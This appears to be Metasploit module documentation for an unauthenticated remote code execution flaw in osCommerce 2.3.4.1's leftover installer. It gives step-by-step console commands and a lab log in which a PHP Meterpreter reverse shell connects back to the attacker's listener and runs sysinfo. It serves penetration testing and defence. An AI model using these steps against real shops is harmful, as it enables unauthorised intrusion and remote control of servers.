Daniel Teixeira
39 lines
1.6 KiB
Markdown
39 lines
1.6 KiB
Markdown
## Vulnerable Application
|
|
|
|
osCommerce version 2.3.4.1 is vulnerable to remote code execution. If the `/install/` directory was not removed, it is possible for an unauthenticated attacker to run the `install_4.php` script, which will create the configuration file for the installation. This allows the attacker to inject PHP code into the configuration file and execute it.
|
|
|
|
## Verification Steps
|
|
|
|
1. Download and install [osCommerce 2.3.4.1](https://www.exploit-db.com/apps/ce2796b352d6e0fb4e9f03866ae98541-oscommerce-2.3.4.zip)
|
|
2. `use exploit/multi/http/oscommerce`
|
|
3. `set RHOST IP`
|
|
4. `set PAYLOAD php/meterpreter/reverse_tcp`
|
|
5. `set LHOST IP`
|
|
6. `exploit`
|
|
7. **Verify** a new Meterpreter session is started
|
|
|
|
## Scenarios
|
|
|
|
### osCommerce version 2.3.4.1 on Debian
|
|
|
|
```
|
|
msf > use exploit/multi/http/oscommerce_installer_unauth_code_exec
|
|
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set RHOST 172.16.40.188
|
|
RHOST => 172.16.40.188
|
|
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set PAYLOAD php/meterpreter/reverse_tcp
|
|
PAYLOAD => php/meterpreter/reverse_tcp
|
|
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > set LHOST 172.16.40.5
|
|
LHOST => 172.16.40.5
|
|
msf exploit(multi/http/oscommerce_installer_unauth_code_exec) > exploit
|
|
|
|
[*] Started reverse TCP handler on 172.16.40.5:4444
|
|
[*] Sending stage (37543 bytes) to 172.16.40.188
|
|
[*] Meterpreter session 1 opened (172.16.40.5:4444 -> 172.16.40.188:47466) at 2018-04-05 18:14:45 +0100
|
|
|
|
meterpreter > sysinfo
|
|
Computer : oscommerce
|
|
OS : Linux oscommerce 3.16.0-4-amd64 #1 SMP Debian 3.16.39-1+deb8u2 (2017-03-07) x86_64
|
|
Meterpreter : php/linux
|
|
meterpreter >
|
|
```
|